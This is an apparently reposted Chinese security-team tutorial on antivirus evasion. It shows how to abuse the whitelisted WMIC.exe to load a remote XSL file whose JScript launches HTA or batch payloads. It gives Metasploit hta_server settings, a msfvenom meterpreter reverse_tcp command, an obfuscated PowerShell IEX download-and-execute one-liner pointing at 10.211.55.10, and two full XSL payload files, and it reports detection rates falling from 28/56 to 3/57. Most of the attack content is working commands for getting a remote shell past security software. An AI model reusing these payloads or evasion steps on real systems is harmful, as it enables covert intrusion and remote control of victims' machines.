远控免杀专题(53)-白名单WMIC.exe执行payload

栏目: IT技术 · 发布时间: 4年前

内容简介:声明:

远控免杀专题(53)-白名单WMIC.exe执行payload

声明: Tide安全团队原创文章,转载请声明出处! 文中所涉及的技术、思路和 工具 仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

文章打包下载及相关软件下载: https://github.com/TideSec/BypassAntiVirus

一、WMIC介绍

WMIC扩展WMI(Windows Management Instrumentation,Windows管理工具),提供了从命令行接口和批命令脚本执行系统管理的支持。在WMIC出现之前,如果要管理WMI系统,必须使用一些专门的WMI应用,例如SMS,或者使用WMI的脚本编程API,或者使用象CIM Studio之类的工具。如果不熟悉C++之类的编程语言或VBScript之类的脚本语言,或者不掌握WMI名称空间的基本知识,要用WMI管理系统是很困难的。WMIC改变了这种情况。

二、WMIC使用

Windows 2003 默认位置:

C:\WINDOWS\system32\wbem\wmic.exe C:\WINDOWS\SysWOW64\wbem\wmic.exe

Windows 7 默认位置:

C:\Windows\System32\wbem\WMIC.exe C:\Windows\SysWOW64\wbem\WMIC.exe

远程执行脚本方式

wmic os get /FORMAT:"http://10.211.55.10/payload.xsl"

三、使用WMIC远程加载payload

wmic可以远程执行任何文件或脚本,因此我们将在XSL代码中链接一个hta文件。XSL文件将包含一个链接,用于通过mshta.exe下载并执行恶意hta文件,该文件由wmic触发。

3.1 利用metasploit

在metasploit的帮助下生成一个hta文件

use exploit/windows/misc/hta_server

set SRVPORT 8088

set srvhost 10.211.55.10

远控免杀专题(53)-白名单WMIC.exe执行payload

并放置在hta文件的链接 payload.xsl

<?xml version='1.0'?>

<stylesheet

xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"

xmlns:user="placeholder"

version="1.0">

<output method="text"/>

<ms:script implements-prefix="user" language="JScript">

<![CDATA[

var r = new ActiveXObject("WScript.Shell").Run("http://10.211.55.10:8088/0lEkSQQmpPP.hta");

]]> </ms:script>

</stylesheet>

目标机器上wmic运行

wmic os get /FORMAT:"http://10.211.55.10/payload.xsl"

执行后hta木马遭到火绒查杀,360提示powershell命令攻击。

远控免杀专题(53)-白名单WMIC.exe执行payload

点击允许后可上线。

远控免杀专题(53)-白名单WMIC.exe执行payload

查看hta文件使用了powershell加载木马

远控免杀专题(53)-白名单WMIC.exe执行payload

将该hta放在virustotal.com上面检测,查杀率28/56

远控免杀专题(53)-白名单WMIC.exe执行payload

3.2 自定义免杀

刚才发现hta文件使用了powershell,遭到拦截。我们重新修改一下。这里payload选择使用powershell

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.211.55.10 LPORT=8080 -f psh-reflection > a.ps1

使用powershell的IEX加载payload,并进行混淆

powershell "$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://10.211.55.10/a.ps1''))';IEX ($a+$b)"

将该命令重命名为a.bat。使用wmic.exe加载脚本

wmic os get /FORMAT:"http://10.211.55.10/demo.xsl"

demo.xsl

<?xml version='1.0'?>

<stylesheet

xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"

xmlns:user="placeholder"

version="1.0">

<output method="text"/>

<ms:script implements-prefix="user" language="JScript">

<![CDATA[

var r = new ActiveXObject("WScript.Shell").Run("a.bat");

]]> </ms:script>

</stylesheet>

远控免杀专题(53)-白名单WMIC.exe执行payload

只有火绒提示"powershell执行可疑文件" 点击允许后可上线

远控免杀专题(53)-白名单WMIC.exe执行payload

a.bat在virustotal.com 上面查杀率为3/57

远控免杀专题(53)-白名单WMIC.exe执行payload

四、参考资料

使用wmic.exe绕过应用程序白名单(多种方法): https://www.cnblogs.com/backlion/p/10489916.html

远控免杀专题(53)-白名单WMIC.exe执行payload

guān

zhù

men

Tide安全团队正式成立于2019年1月 是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

对安全感兴趣的小伙伴可以 关注团队官网: http://www.TideSec.com 或长按二维码关注公众号:

远控免杀专题(53)-白名单WMIC.exe执行payload

远控免杀专题(53)-白名单WMIC.exe执行payload


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

B端产品经理必修课

B端产品经理必修课

李宽 / 电子工业出版社 / 2018-9 / 59

《B端产品经理必修课:从业务逻辑到产品构建全攻略》主要讲述了“单个产品管理流程”,以展示B 端产品经理的工作方法及B 端产品的设计方法。《B端产品经理必修课:从业务逻辑到产品构建全攻略》分为三个部分。第一部分主要讲述的是B 端产品经理的工作流程和定义(即单个产品管理流程),以及从事B 端产品经理的职业现状和规划,还包括设计B 端产品时需要了解的指导思想。第二部分是通过各个章节来讲述单个产品管理流程......一起来看看 《B端产品经理必修课》 这本书的介绍吧!

HTML 编码/解码
HTML 编码/解码

HTML 编码/解码

URL 编码/解码
URL 编码/解码

URL 编码/解码

XML、JSON 在线转换
XML、JSON 在线转换

在线XML、JSON转换工具